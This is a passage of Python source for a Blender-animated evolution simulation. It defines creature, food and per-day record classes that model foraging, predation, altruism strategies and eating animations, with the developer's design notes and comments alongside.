- Makes size better, since there are more creature interactions.
- Makes sense worse, since you're more likely to sense others
even with low sense.
- Makes speed better, since there is more predation and direct food
competition.
- Food density. Effects similar to those of creature density. They should also
track each other closely.
- Starting energy vs world size.
- Makes low stats better because of efficiency.
- May actually make sense more valuable, though, since that adds efficiency.
Learnings:
- It seems like it was a bad call to use bobjects and bobject methods for the
sim. Bobjects and their methods are made to be easy to use for arranging
objects manually throughout a scene, but when embedded in automated structures,
they cause two problems. First, methods like bobject.move_to() place a starting
keyframe and ending keyframe. This can cause durations to overlap, creating
confused motions. Second, the bobject methods generally use seconds as the
time unit. This is all well and good when thinking directly about a timeline,
but using them alongside the blender api creates a need to convert units often,
giving many chances for confusion, bugs, and ugliness.
EDIT: This might be okay as long as objects in blender aren't reused for
multiple sim objects, which is where the overlapping keyframe confusion seems
to occur.
- Managing the double-parent relationships has proven difficult. It may have been
better to have a childof constraint rather than full parenting of the food,
since the constraints can simply be turned off.
"""
class CreatureDay(object):
    """Per-day record of one creature's simulated state.

    Most attributes are lists holding one entry per simulation step, so
    any of these values can be animated over the course of the day.
    """
    def __init__(self, creature = None, date = 0):
        if creature == None:
            raise Warning("CreatureDay must belong to a creature")
        self.creature = creature
        self.date = date
        # Step-by-step movement state. Several heading-related series are
        # kept so turns can be animated smoothly.
        self.heading_targets = []
        self.d_headings = [] # turn rate
        self.headings = []
        self.locations = []
        # Step-by-step status series.
        self.has_eaten = []
        self.energies = []
        self.states = []
        # Day-level outcomes.
        self.has_helped = 0
        self.dead = False
        self.death_time = None
        self.home_time = None
class Food(object):
"""docstring for Food."""
def __init__(
self,
world_location = [0, 0, 0],
parents = [],
world = None
#has_world_as_parent = True
):
self.world_location = world_location
self.world = world
self.is_eaten = False
#self.was_shared = False
'''if isinstance(parents, list):
self.parents = parents
else:
self.parents = [parents]'''
#self.parents.append(self.world)
    def git_ate(
        self,
        eater = None,
        start_time = None,
        time_step = 0.3,
        drawn_world = None
    ):
        """Animate this food being eaten by 'eater'.

        Re-parents the food to the eater via a keyframed child-of
        constraint, corrects the food's transform so it does not visually
        jump when the constraint engages, then animates it moving in front
        of the eater and shrinking to nothing while the eater plays its
        eating animation.

        eater: the Creature doing the eating (required).
        start_time: time on the world timeline, in seconds (required).
        time_step: sim time per step; scales the animation duration.
        drawn_world: required to be non-None, but only validated here.
        Returns (loc_diff, rot_diff), the location and rotation corrections
        applied, so a creature that is itself eaten can fix up the
        transforms of things it has already eaten.
        """
        if start_time == None:
            raise Warning('Need start time for git_ate')
        #Make sure these are on frames
        #start_time = round(start_time * 60) / 60
        start_frame = math.floor(start_time * 60)
        duration = 50 * time_step * SIM_RESOLUTION
        #50 is duration of eat animation in world time
        #Should really be a constant
        duration_frames = max(math.floor(duration * 60), 3)
        #end_time = start_time + duration
        end_frame = start_frame + duration_frames
        if drawn_world == None:
            raise Warning('Need to define drawn_world for git_ate')
        if eater == None:
            raise Warning("Need to define eater")
        #if eater not in self.parents:
        self.make_child_of_constraint(parent = eater.bobject.ref_obj)
        '''for cons in self.bobject.ref_obj.constraints:
            cons.keyframe_insert(data_path = 'influence', frame = start_frame)
            if cons.target == eater.bobject.ref_obj:
                cons.influence = 1
            else:
                cons.influence = 0
            cons.keyframe_insert(data_path = 'influence', frame = start_frame + 1)'''
        #Switch on the eater's constraint over a single frame.
        for cons in self.bobject.ref_obj.constraints:
            if cons.target == eater.bobject.ref_obj:
                cons.keyframe_insert(data_path = 'influence', frame = start_frame)
                cons.influence = 1
                cons.keyframe_insert(data_path = 'influence', frame = start_frame + 1)
        #There is almost certainly a more elegant way to do this, but there are
        #several transformation matrices which don't seem to reliably update,
        #and there's an extra complication because the 'parent' in the childof
        #constraint has the same parent as the food object, making the real parent
        #affect the transform twice.
        #I gave up and did a more manual calculation of the location.
        rel = (self.bobject.ref_obj.location - eater.bobject.ref_obj.location)
        ang = eater.bobject.ref_obj.rotation_euler[2]
        sca = eater.size * BASE_CREATURE_SCALE #eater.bobject.ref_obj.scale
        #Above line refers to creature property rather than object property in
        #blender, since I ran into a bug where the blender object was scaled to
        #zero (not keyframed) when this code executes. The creature property should
        #be the intended value and not change.
        #Rotate/scale the offset into the eater's local frame.
        loc_in_new_ref_frame = [
            (rel[0] * math.cos(-ang) - rel[1] * math.sin(-ang)) / sca,#[0],
            (rel[0] * math.sin(-ang) + rel[1] * math.cos(-ang)) / sca,#[1],
            rel[2] / sca,#[2]
        ]
        #Need to correct scale because the child_of constraint doesn't use scale
        #The intent is to not affect the scale of the object itself, but the
        #scale of the eater should be used to determine the position. So that's
        #here.
        for i in range(len(loc_in_new_ref_frame)):
            loc_in_new_ref_frame[i] *= eater.bobject.ref_obj.scale[i]
        #Subtract the contribution of the common parent (so it just contributes once)
        corrected_loc = [
            loc_in_new_ref_frame[0] - eater.bobject.ref_obj.parent.location[0] / eater.bobject.ref_obj.parent.scale[0],
            loc_in_new_ref_frame[1] - eater.bobject.ref_obj.parent.location[1] / eater.bobject.ref_obj.parent.scale[1],
            loc_in_new_ref_frame[2] - eater.bobject.ref_obj.parent.location[2] / eater.bobject.ref_obj.parent.scale[2],
        ]
        #Rotation should be part of the childof constraint for the purpose of
        #updating location, but the object itself shouldn't rotate.
        #So subtract the eater's rotation.
        corrected_rot = [
            self.bobject.ref_obj.rotation_euler[0] - eater.bobject.ref_obj.rotation_euler[0],
            self.bobject.ref_obj.rotation_euler[1] - eater.bobject.ref_obj.rotation_euler[1],
            self.bobject.ref_obj.rotation_euler[2] - eater.bobject.ref_obj.rotation_euler[2],
        ]
        #Store differences to return for subclass implementation
        #When eaten, creatures should correct locations of things they've eaten
        #to avoid those things teleporting. This is a mess, eh?
        loc_diff = add_lists_by_element(
            corrected_loc,
            self.bobject.ref_obj.location,
            subtract = True
        )
        rot_diff = add_lists_by_element(
            corrected_rot,
            self.bobject.ref_obj.rotation_euler,
            subtract = True
        )
        #Change location to be the same in new reference frame
        self.bobject.move_to(
            start_frame = start_frame,
            end_frame = start_frame + 1,
            new_location = corrected_loc,
            new_angle = corrected_rot
        )
        #Move in front of creature
        self.bobject.move_to(
            start_frame = start_frame + 1,
            end_frame = start_frame + math.floor(duration_frames / 2),
            new_location = [
                - eater.bobject.ref_obj.parent.location[0] / eater.bobject.ref_obj.parent.scale[0] + eater.bobject.ref_obj.scale[2],
                - eater.bobject.ref_obj.parent.location[1] / eater.bobject.ref_obj.parent.scale[1],
                eater.bobject.ref_obj.scale[2] / 5
            ]
        )
        #Move into creature and shrink
        self.bobject.move_to(
            start_frame = start_frame + math.ceil(duration_frames / 2),
            end_frame = end_frame,
            new_location = [
                - eater.bobject.ref_obj.parent.location[0] / eater.bobject.ref_obj.parent.scale[0],
                - eater.bobject.ref_obj.parent.location[1] / eater.bobject.ref_obj.parent.scale[1],
                eater.bobject.ref_obj.scale[2] / 5
            ],
            new_scale = 0
        )
        eater.eat_animation(start_time = start_time, time_step = time_step)
        eater.bobject.blob_scoop(start_time = start_time, duration = duration)
        #I don't remember why I'm multiplying things by 50, tbh, but it works.
        #I'm good at coding.
        return loc_diff, rot_diff #, self.bobject.ref_obj
def make_child_of_constraint(self, parent = None):
if self.bobject == None:
raise Warning('Food needs a bobject to get parent')
constraints = self.bobject.ref_obj.constraints
make_new = True
for cons in constraints:
if cons.type == 'CHILD_OF' and cons.target == parent:
make_new = False
if make_new == True:
new_cons = self.bobject.ref_obj.constraints.new('CHILD_OF')
new_cons.use_scale_x = False
new_cons.use_scale_y = False
new_cons.use_scale_z = False
new_cons.influence = 0
if parent == None:
raise Warning('Need parent for child_of constraint')
new_cons.target = parent
'''def add_to_blender(self):
self.bobject = import_object(
'goodicosphere', 'primitives',
#world_location = [0, 0, 0],
location = [0, 0, 0],
scale = FOOD_SCALE
)
apply_material(self.bobject.ref_obj.children[0], 'color7')'''
class Creature(Food):
def __init__(
self,
speed = 1,
size = 1,
sense = 1,
altruist = False,
green_beard = False,
gbo = False,
a_gb = False,
kin_altruist = False,
kin_radius = 0,
parent = None,
world = None
):
super().__init__()
self.speed = speed
self.size = size
self.sense = sense
self.altruist = altruist
self.green_beard = green_beard
self.a_gb = a_gb
self.gbo = gbo
self.green_beard = green_beard
self.kin_altruist = kin_altruist
self.kin_radius = kin_radius
self.parent = parent
self.children = []
self.days = []
self.bobject = None
self.world = world
cost = 0
cost += (self.size * SIZE_ADJUST_FACTOR) ** 3 * (self.speed * SPEED_ADJUST_FACTOR) ** 2 #* 2
#cost += (self.size * SIZE_ADJUST_FACTOR) ** 3 / 2
cost += self.sense
self.energy_cost = cost / SIM_RESOLUTION
    def new_day(self, date = 0):
        """Start a new CreatureDay for this creature.

        Initial position and heading come from one of three cases:
        - first day of an initial creature: random placement on a wall;
        - first day of a newborn: parent's end-of-previous-day position,
          heading reversed;
        - continuing creature: its own end-of-day position, heading reversed.

        date -- integer index of the simulated day.
        """
        new_day = CreatureDay(creature = self, date = date)
        parent = self.parent
        if len(self.days) == 0: #First day of life, ahhhh.
            if parent == None or date == 0: #For initial creatures
                loc, heading_target, heading = self.random_wall_placement()
                new_day.locations.append(loc)
                new_day.heading_targets.append(heading_target)
                new_day.d_headings.append(0)
                new_day.headings.append(heading)
            elif parent != None:
                #Perhaps not the most robust way to do it, but using days[-2]
                #here because the parents make their new days before the
                #children, since the children are added to the end of the
                #creature list on their first day
                new_day.locations.append(parent.days[-2].locations[-1])
                new_day.heading_targets.append(
                    parent.days[-2].heading_targets[-1] + math.pi
                )
                new_day.d_headings.append(0)
                new_day.headings.append(
                    parent.days[-2].headings[-1] + math.pi
                )
        else:
            #Continuing creature: start from yesterday's final position,
            #facing back into the world (heading + pi).
            new_day.locations.append(
                self.days[-1].locations[-1]
            )
            new_day.heading_targets.append(
                self.days[-1].heading_targets[-1] + math.pi
            )
            new_day.d_headings.append(0)
            new_day.headings.append(
                self.days[-1].headings[-1] + math.pi
            )
        new_day.has_eaten.append([]) #Nothing eaten yet today
        new_day.energies.append(self.world.initial_energy)
        self.days.append(new_day)
def random_wall_placement(self):
wall_roll = random()
#print()
#print(wall_roll)
if wall_roll < 0.25:
#print('Top')
loc = [
uniform(-self.world.dimensions[0], self.world.dimensions[0]),
self.world.dimensions[1],
CREATURE_HEIGHT * self.size
]
heading_target = - math.pi / 2
heading = - math.pi / 2
elif wall_roll < 0.5:
#print('Right')
loc = [
self.world.dimensions[0],
uniform(-self.world.dimensions[1], self.world.dimensions[1]),
CREATURE_HEIGHT * self.size
]
heading_target = math.pi
heading = math.pi
elif wall_roll < 0.75:
#print('Bottom')
loc = [
uniform(-self.world.dimensions[0], self.world.dimensions[0]),
-self.world.dimensions[1],
CREATURE_HEIGHT * self.size
]
heading_target = math.pi / 2
heading = math.pi / 2
else:
#print('Left')
loc = [
-self.world.dimensions[0],
uniform(-self.world.dimensions[1], self.world.dimensions[1]),
CREATURE_HEIGHT * self.size
]
heading_target = 0
heading = 0
other_cres = [x for x in self.world.date_records[-1]['creatures'] if \
len(x.days) > 0]
for cre in other_cres:
cre_loc = cre.days[-1].locations[-1]
dist = vec_len(add_lists_by_element(cre_loc, loc, subtract = True))
if dist < EAT_DISTANCE:
self.random_wall_placement()
return loc, heading_target, heading
    def take_step(self):
        """Advance this creature by one sim step of the current day.

        Mutates the latest CreatureDay in place: appends new state, heading
        target, heading, location, energy, and eaten-food entries. Handles
        the state machine (foraging / homebound / samaritan / fleeing),
        eating food and smaller creatures, giving food away, and death when
        energy runs out.
        """
        day = self.days[-1]
        #This set of conditionals is a bit of a frankenstein monster. Could
        #be streamlined.
        has_energy = True
        if day.energies[-1] == None:
            has_energy = False
            #print('HAS ENERGY IS FALSE')
        else:
            steps_left = math.floor(day.energies[-1] / self.energy_cost)
            #print('Steps left = ' + str(steps_left))
            distance_left = steps_left * self.speed * SPEED_ADJUST_FACTOR
            if steps_left <= 1:
                #For some reason, steps_left is never less than one, at least for
                #integer energy costs. I can't figure out why. So, some creatures
                #are going to take one fewer step than they could have. Meh.
                #print(day.energies[-1])
                #print(self.energy_cost)
                has_energy = False
        #Out of energy away from home: the creature dies this step
        if has_energy == False and day.death_time == None and day.home_time == None:
            day.death_time = len(day.locations)
            day.dead = True
            was_samaritan = False
            for sta in day.states:
                if sta == 'samaritan':
                    was_samaritan = True
            if was_samaritan == True:
                print("I ran out of energy after being a samaritan!")
                print(day.locations[-1])
        if self.days[-1].dead == True:
            #Dead creatures append None placeholders to keep lists in step
            day.heading_targets.append(None)
            day.d_headings.append(None)
            day.headings.append(None)
            day.locations.append(None)
            self.world_location = None
            day.has_eaten.append(copy(day.has_eaten[-1]))
            day.energies.append(None)
        else:
            day.has_eaten.append(copy(day.has_eaten[-1])) #Append new eaten state to fill with food
            """Update heading based on state"""
            state = None
            #Distance to the nearest wall (shortest way out of the world)
            distance_out = min(
                self.world.dimensions[0] - abs(day.locations[-1][0]),
                self.world.dimensions[1] - abs(day.locations[-1][1]),
            )
            if len(day.has_eaten[-1]) == 0:
                state = 'foraging'
            elif len(day.has_eaten[-1]) == 1:
                #print(day.locations[-1])
                #print(distance_out)
                #print(distance_left)
                last_state = None
                try:
                    last_state = day.states[-1]
                except:
                    pass
                #print(last_state)
                #With one food: head home when energy is getting low, and
                #once homebound, stay homebound.
                if distance_left < distance_out * HOMEBOUND_RATIO or \
                last_state == 'homebound':
                    state = 'homebound'
                else:
                    state = 'foraging'
                #print(state)
            elif len(day.has_eaten[-1]) > 1:
                state = 'homebound'
            else:
                raise Warning('Somehow, the creature has eaten negative or fractional food')
            #With surplus food and plenty of energy, try to give food away
            if state == 'homebound' and \
            len(day.has_eaten[-1]) > 1 and \
            distance_left > distance_out * HOMEBOUND_RATIO * SAMARITAN_RATIO:
                state = 'samaritan'
            new_heading = None
            #Sense food. Eat if in eat range. If not, set new_heading toward
            #closest food sensed. (New heading can be overridden if creature
            #is fleeing or homebound)
            closest_food_dist = math.inf
            target_food = None
            food_objects = self.world.date_records[day.date]['food_objects']
            remaining_food = [x for x in food_objects if x.is_eaten == False]
            close_food = [x for x in remaining_food if vec_len(add_lists_by_element(x.world_location, day.locations[-1], subtract = True)) < EAT_DISTANCE + BASE_SENSE_DISTANCE * self.sense]
            creatures = self.world.date_records[day.date]['creatures']
            live_creatures = [x for x in creatures if x.days[-1].dead == False]
            close_creatures = [x for x in live_creatures if vec_len(add_lists_by_element(x.world_location, day.locations[-1], subtract = True)) < EAT_DISTANCE + BASE_SENSE_DISTANCE * self.sense]
            #Decide which nearby creatures this one is willing to help,
            #depending on its altruism strategy trait.
            if self.altruist == True:
                #print('altruist')
                to_be_nice_to = close_creatures
            elif self.green_beard == True:
                #print("green beard")
                to_be_nice_to = [x for x in close_creatures if x.green_beard == True]
            elif self.a_gb == True:
                to_be_nice_to = [x for x in close_creatures if x.gbo == True]
            elif self.kin_altruist == True:
                #to_be_nice_to = [x for x in close_creatures if \
                #    ((x.size - self.size) ** 2 + (x.speed - self.speed) ** 2 + \
                #    (x.sense - self.sense) ** 2) ** (1/2) < KIN_ALTRUISM_RADIUS]
                #Build the family set by walking parent/child links out to
                #FAMILY_JUMPS hops from self.
                fam = [self]
                fam_to_check = [self]
                for i in range(FAMILY_JUMPS):
                    new_fam = []
                    for cre in fam_to_check:
                        if cre.parent != None and cre.parent not in fam:
                            new_fam.append(cre.parent)
                        for chi in cre.children:
                            if chi not in fam:
                                new_fam.append(chi)
                    fam = fam + new_fam
                    fam_to_check = new_fam
                to_be_nice_to = [x for x in close_creatures if x in fam]
                #to_be_nice_to = [x for x in live_creatures if x.parent == self or self.parent == x]
                #Gave kin altruists the ability to go help any related creature
                #regardless of distance, to increase the number of interactions
            else:
                #Default: help creatures within kin_radius in trait space
                to_be_nice_to = [x for x in close_creatures if \
                    ((x.size - self.size) ** 2 + (x.speed - self.speed) ** 2 + \
                    (x.sense - self.sense) ** 2) ** (1/2) < self.kin_radius]
            #print(len(to_be_nice_to))
            if state == 'samaritan':
                #Find the closest helpable creature that has no food
                to_be_helped = None
                to_be_helped_dist = math.inf
                for cre in to_be_nice_to:
                    if len(cre.days[-1].has_eaten[-1]) == 0:
                        vec_to_help = add_lists_by_element(
                            cre.days[-1].locations[-1],
                            self.days[-1].locations[-1],
                            subtract = True
                        )
                        dist = vec_len(vec_to_help)
                        if dist < to_be_helped_dist:
                            to_be_helped_dist = dist
                            to_be_helped = cre
                if to_be_helped != None:
                    if dist < EAT_DISTANCE:
                        #Give food
                        to_be_helped.days[-1].has_eaten[-1].append(
                            self.days[-1].has_eaten[-1].pop()
                        )
                        self.days[-1].has_helped += 1
                        day.states.append(str(state)) #Make sure to count samaritan attempt
                        if distance_left < distance_out * HOMEBOUND_RATIO:
                            state = 'homebound'
                        else:
                            state = 'foraging'
                    else:
                        #print('Heading to give food')
                        new_heading = math.atan2(vec_to_help[1], vec_to_help[0])
                else:
                    state = 'homebound'
                    #print("Nobody to help")
            #Forget about food that another slower-but-similar creature is going
            #for,
            #if you're not about to starve
            #if len(day.has_eaten[-1]) > -1:
            '''for cre in to_be_nice_to:
                if cre.speed < self.speed and len(day.has_eaten[-1]) > 0:
                    claimed_food = None
                    claimed_food_dist = math.inf
                    for food in close_food:
                        dist = vec_len(add_lists_by_element(food.world_location, cre.days[-1].locations[-1], subtract = True))
                        if dist < EAT_DISTANCE + BASE_SENSE_DISTANCE * cre.sense:
                            if dist < claimed_food_dist:
                                claimed_food_dist = dist
                                claimed_food = food
                    #print("     Leaving a food for that creature    ")
                    if claimed_food != None:
                        close_food.remove(claimed_food)'''
            #Who to eat?
            edible_creatures = [x for x in close_creatures if x.is_eaten == False and \
                x.size * PREDATOR_SIZE_RATIO <= self.size and \
                x.days[-1].home_time == None] #You're safe when you're home
            #Don't eat similar creatures you're nice to
            #if you're not about to starve
            #if len(day.has_eaten[-1]) > 0:
            #    edible_creatures = [x for x in edible_creatures if x not in to_be_nice_to]
            visible_food = edible_creatures + close_food
            for food in visible_food:
                try:
                    dist = vec_len(add_lists_by_element(
                        food.world_location,
                        day.locations[-1],
                        subtract = True
                    ))
                except:
                    print(food.world_location)
                    print(day.locations[-1])
                #Eat anything (food or smaller creature) within reach, up to 2
                if dist < EAT_DISTANCE and len(day.has_eaten[-1]) < 2:
                    if isinstance(food, Creature):
                        #Eating a creature also takes everything it had eaten
                        food.days[-1].dead = True
                        food.days[-1].death_time = len(food.days[-1].locations)
                        for nom in food.days[-1].has_eaten[-1]:
                            day.has_eaten[-1].append(nom)
                        was_samaritan = False
                        for sta in food.days[-1].states:
                            if sta == 'samaritan':
                                was_samaritan = True
                        if was_samaritan == True:
                            print("I was eaten after being a samaritan!")
                    day.has_eaten[-1].append(food)
                    food.is_eaten = True
                    #print('Heyyyyyy')
                #TODO: Remove later to deal with ties.
                elif dist < EAT_DISTANCE + BASE_SENSE_DISTANCE * self.sense \
                and dist < closest_food_dist:
                    closest_food_dist = dist
                    target_food = food
            #print(state)
            if state == 'foraging' and target_food != None:
                vec_to_food = add_lists_by_element(
                    target_food.world_location,
                    day.locations[-1],
                    subtract = True
                )
                new_heading = math.atan2(vec_to_food[1], vec_to_food[0])
            #Wander around waiting to sense food.
            if state == 'foraging' and target_food == None:
                rand = uniform(-HEADING_TARGET_VARIATION, HEADING_TARGET_VARIATION)
                #Check whether creature is close to edge
                #Could make this more robust for non_square worlds if necessary
                TURN_DISTANCE = 60
                loc = day.locations[-1]
                if max(abs(loc[0]), abs(loc[1])) + TURN_DISTANCE > \
                self.world.dimensions[0]:
                    #Near a wall: steer back toward the center instead
                    ht = day.heading_targets[-1] #angle in radians
                    atc = math.atan2(loc[1], loc[0]) + math.pi #angle to center
                    correction = atc - ht
                    rand = correction
                new_heading = day.heading_targets[-1] + rand
                #print(new_heading)
            #Check for predators. If one is close, abandon foraging and flee
            closest_pred_dist = math.inf
            threat = None
            #creatures = self.world.date_records[day.date]['creatures']
            predators = [x for x in close_creatures if \
            x.size >= self.size * PREDATOR_SIZE_RATIO]
            '''safe_to_help = []
            for pred in predators:
                safe = False
                if pred.altruist == True:
                    safe = True
                if pred.green_beard == True and self.green_beard == True:
                    safe = True
                if ((pred.size - self.size) ** 2 + (pred.speed - self.speed) ** 2 + \
                (pred.sense - self.sense) ** 2) ** (1/2) < pred.kin_radius:
                    safe = True
                if safe == True:
                    safe_to_help.append(pred)
            predators = [x for x in predators if x not in safe_to_help]'''
            for pred in predators:
                try:
                    dist = vec_len(
                        add_lists_by_element(
                            pred.days[-1].locations[-1],
                            day.locations[-1],
                            subtract = True
                        )
                    )
                except:
                    print(pred.days[-1].locations[-1]),
                    print(day.locations[-1])
                    #NOTE(review): `raise()` raises "TypeError: exceptions
                    #must derive from BaseException" rather than re-raising
                    #the caught exception; bare `raise` was likely intended.
                    raise()
                if dist < closest_pred_dist:
                    closest_pred_dist = dist
                    threat = pred
            if threat != None:
                state = 'fleeing'
            if state == 'fleeing':
                #Head directly away from the nearest predator
                #day.heading_targets.append(day.heading_targets[-1])
                vec_to_pred = add_lists_by_element(
                    threat.world_location,
                    day.locations[-1],
                    subtract = True
                )
                angle_to_pred = math.atan2(vec_to_pred[1], vec_to_pred[0])
                #print(angle_to_pred)
                new_heading = angle_to_pred + math.pi
            if state == 'homebound': #Creature is full or has eaten and is tired
                #Head straight at whichever wall is closest
                if self.world.dimensions[0] - abs(day.locations[-1][0]) < \
                self.world.dimensions[1] - abs(day.locations[-1][1]):
                    #Go in x-direction
                    if day.locations[-1][0] > 0:
                        target = 0
                    else:
                        target = math.pi
                else:
                    if day.locations[-1][1] > 0:
                        target = math.pi / 2
                    else:
                        target = - math.pi / 2
                new_heading = target
                #print('heading home')
            day.states.append(state)
            #Add new_heading to the heading_targets list
            #print(new_heading)
            day.heading_targets.append(new_heading)
            #Calculate heading
            #Note that lists are of different lengths in the line below
            heading_discrepancy = day.heading_targets[-1] - day.headings[-1]
            #Make sure abs(heading_discrepancy) <= 2pi
            while heading_discrepancy > math.pi:
                day.heading_targets[-1] -= 2 * math.pi
                heading_discrepancy = day.heading_targets[-1] - day.headings[-1]
            while heading_discrepancy < -math.pi:
                day.heading_targets[-1] += 2 * math.pi
                heading_discrepancy = day.heading_targets[-1] - day.headings[-1]
            if heading_discrepancy == 0:
                d_d_heading = 0
            else:
                #Turn acceleration toward the target heading
                d_d_heading = heading_discrepancy / abs(heading_discrepancy) \
                * TURN_ACCELERATION
            day.d_headings.append(day.d_headings[-1] + d_d_heading)
            #Speed limit
            if day.d_headings[-1] > MAX_TURN_SPEED:
                day.d_headings[-1] = MAX_TURN_SPEED
            elif day.d_headings[-1] < -MAX_TURN_SPEED:
                day.d_headings[-1] = -MAX_TURN_SPEED
            #Prevent overshooting
            if heading_discrepancy == 0:
                day.d_headings[-1] = 0
            elif day.d_headings[-1] / heading_discrepancy > 1:
                day.d_headings[-1] = heading_discrepancy
            #No turning if you're out of energy or have gone home
            if has_energy == False or day.home_time != None:
                day.d_headings[-1] = 0
            day.headings.append(day.headings[-1] + day.d_headings[-1])
            """Update location"""
            #Go slower when turning, making it look more natural
            effective_speed = self.speed * SPEED_ADJUST_FACTOR * \
            (1 - pow(abs(day.d_headings[-1]) / MAX_TURN_SPEED, 2) / 2)
            #If outside world, just stop
            heading_vec = [math.cos(day.headings[-1]), math.sin(day.headings[-1]), 0]
            if (abs(day.locations[-1][0]) >= self.world.dimensions[0] or \
            abs(day.locations[-1][1]) >= self.world.dimensions[1]) and \
            dot_product(heading_vec, day.locations[-1]) > 0:
                effective_speed = 0
                #Reaching the wall with food counts as making it home
                if day.home_time == None and len(day.has_eaten[-1]) > 0:
                    day.home_time = len(day.locations)
            #No moving if you're out of energy
            if has_energy == False:
                effective_speed = 0
                if day.dead == False:
                    if day.home_time == None:
                        #NOTE(review): 'anergy' looks like a typo for 'energy'
                        raise Warning('Something with no anergy is alive...')
                    was_samaritan = False
                    for sta in day.states:
                        if sta == 'samaritan':
                            was_samaritan = True
                    if was_samaritan == True:
                        if day.home_time != None:
                            pass
                            #print("I have no energy after being a samaritan, but I'm home, so it's k.")
                        else:
                            print("I have no energy after being a samaritan!")
                            raise Warning('A samaritan died after helping')
            day.locations.append([
                day.locations[-1][0] + math.cos(day.headings[-1]) * effective_speed / SIM_RESOLUTION,
                day.locations[-1][1] + math.sin(day.headings[-1]) * effective_speed / SIM_RESOLUTION,
                day.locations[-1][2]
            ])
            #prevent overshoot
            x_overshoot = abs(day.locations[-1][0]) - self.world.dimensions[0]
            if x_overshoot > 0:
                if day.locations[-1][0] > 0:
                    day.locations[-1][0] -= x_overshoot
                else:
                    day.locations[-1][0] += x_overshoot
            y_overshoot = abs(day.locations[-1][1]) - self.world.dimensions[1]
            if y_overshoot > 0:
                if day.locations[-1][1] > 0:
                    day.locations[-1][1] -= y_overshoot
                else:
                    day.locations[-1][1] += y_overshoot
            self.world_location = day.locations[-1]
            #Update energy
            day.energies.append(day.energies[-1] - self.energy_cost)
        """
        Plan
        - sense, speed^2, size^3
            - No running, 2x pred ratio
                - 100 food - Lots of small, fast creatures. Maybe 1/2 on average
                  with many in the 0.1 range.
                - 200 food - Size about 1 size on average.
                - 300 food - Size about 1.25 on average
            - No running, 1.2x pred ratio
                - 50 food - Size about 1 on average. (few creatures)
                - 100 food - Size about 1.25 on average
                - 200 food -
                - 300 food - 1.5 on average (and seems like it would go further)
            - No running, 1.5x pred ratio (Try if preds can't take hold)
                - 50 food - Size about 0.7 on average
                - 100 food -
                - 200 food -
                - 300 food - Average about 1.3
            - Running (Try if Bigs dominate too much. Not the case so far.)
                - 100 food -
                - 200 food -
                - 300 food -
        - sense, speed^2, size^2 (Try if bigs can't take hold.)
            -
        - sense, speed^2*size^3
            - No running, 1.2x pred ratio
                - 50 food -
                - 100 food -
                - 200 food -
                - 300 food - Over 1.5 size on average
        - sense, speed^2*size^3, size^3
            - No running, 1.2x pred ratio
                - 50 food - 0.75 average size after 15 gens. 0.9 after 30.
                - 100 food -
                - 200 food - Size 1.3-1.4 average after 30
                - 300 food - Size 1.3-1.4 average after 15 (Maybe still trending?)
            - With running, 1.2x pred ratio
                - 50 food - 0.7 avg size. Speed high.
                - 100 food -
                - 200 food -
                - 300 food - Size 1.3-1.4 average after 30. Speed is higher.
        """
def eat_animation(self, start_time = None, end_time = None, time_step = 0.3):
if start_time == None:
raise Warning('Need to define start time and end time for eat animation')
if end_time == None:
end_time = start_time + 0.3 #Should make this a constant
start_time = round(start_time * 60) / 60
duration = 50 * time_step * SIM_RESOLUTION
duration = max(round(duration * 60) / 60, 1/30)
end_time = start_time + duration
start_frame = start_time * FRAME_RATE
end_frame = end_time * FRAME_RATE
self.bobject.eat_animation(start_frame = start_frame, end_frame = end_frame)
    def add_to_blender(self, appear_time = None, world = None, transition_time = None):
        """Create and place this creature's Blobject in the Blender scene.

        appear_time -- time in seconds when the creature appears (required).
        world -- sim world, used for unit conversion (required).
        transition_time -- optional appear-transition length passed through
            to the blobject.

        Scales eyes by sense, adds a beard for green_beard/gbo traits, and
        applies a speed-based material.
        """
        #Note that this is not a subclass of bobject
        if appear_time == None:
            raise Warning("Must define appear_time to add creature to Blender")
        if world == None:
            raise Warning("Must define world to add creature to Blender")
        cre_bobj = blobject.Blobject(
            location = scalar_mult_vec(
                self.days[0].locations[0],
                world.blender_units_per_world_unit
            ),
            scale = self.size * BASE_CREATURE_SCALE,
            rotation_euler = [0, 0, self.days[0].headings[0]],
            wiggle = True
        )
        if self.green_beard == True:
            cre_bobj.add_beard(mat = 'color7', low_res = True)
        try:
            if self.gbo == True:
                cre_bobj.add_beard(mat = 'color7', low_res = True)
        except:
            pass
            #Some sims were run before self.gbo existed
        #Rotate creature so a ref_obj rotation_euler of [0, 0, 0] results in
        #an x-facing blob standing in the z direction
        cre_bobj.ref_obj.children[0].rotation_euler = [math.pi / 2, 0, math.pi / 2]
        eyes = []
        for obj in cre_bobj.ref_obj.children[0].children:
            if 'Eye' in obj.name:
                eyes.append(obj)
        #Eye size visualizes the sense trait
        for eye in eyes:
            eye.scale = [
                self.sense,
                self.sense,
                self.sense,
            ]
            eye.keyframe_insert(data_path = 'scale', frame = appear_time * FRAME_RATE)
        self.bobject = cre_bobj
        #apply_material_by_speed(cre_bobj.ref_obj.children[0].children[0], 'creature_color3')
        self.apply_material_by_speed()
        if transition_time == None:
            cre_bobj.add_to_blender(appear_time = appear_time)
        else:
            cre_bobj.add_to_blender(
                appear_time = appear_time,
                transition_time = transition_time
            )
    def apply_material_by_speed(
        self,
        time = 0,
        bobj = None,
        spd = None,
        obj = None,
    ):
        """Apply a material to this creature's (or a given) blender object.

        Despite the name, the speed-based color mapping is currently disabled
        (kept below as a commented-out string); every creature just gets the
        'creature_color3' material. Records spd on the bobject so reused
        bobjects remember the speed they were colored for.
        """
        #2 -> Blue
        #6 -> Green
        #4 -> Yellow
        #3 -> Orange
        #5 -> Red
        #Kind of ridiculous. Should really just make this a more generalized
        #bobject method.
        if obj == None:
            if bobj == None:
                bobj = self.bobject
                spd = self.speed
                #bobj == self.bobject here, so this targets the beard
                #sub-object of this creature's own blob (if one exists).
                for child in self.bobject.ref_obj.children[0].children:
                    if child.name[-9:] == 'brd_mball':
                        obj = child
            else:
                obj = bobj.ref_obj.children[0]
        #Commented out because I just want blue creatures now.
        #Such graceful
        '''if spd < 1 - 3 * SPEED_PER_COLOR:
            color = COLORS_SCALED[0]
        elif spd < 1 - 2 * SPEED_PER_COLOR:
            #black to purple
            range_floor = 1 - 3 * SPEED_PER_COLOR
            mix = (spd - range_floor) / SPEED_PER_COLOR
            #color = mix_colors(COLORS_SCALED[6], COLORS_SCALED[4], mix)
            color = mix_colors(COLORS_SCALED[0], COLORS_SCALED[7], mix)
        elif spd < 1 - SPEED_PER_COLOR:
            #Purple to blue
            range_floor = 1 - 2 * SPEED_PER_COLOR
